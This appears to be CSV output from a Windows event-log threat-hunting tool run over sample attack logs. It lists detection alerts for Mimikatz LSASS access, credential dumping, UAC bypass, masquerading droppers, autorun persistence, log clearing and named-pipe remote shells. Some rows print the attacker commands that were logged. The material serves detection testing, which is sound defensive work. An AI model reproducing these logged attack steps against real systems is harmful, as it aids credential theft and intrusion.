Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c 
sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon 
Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: 
Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : 
Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 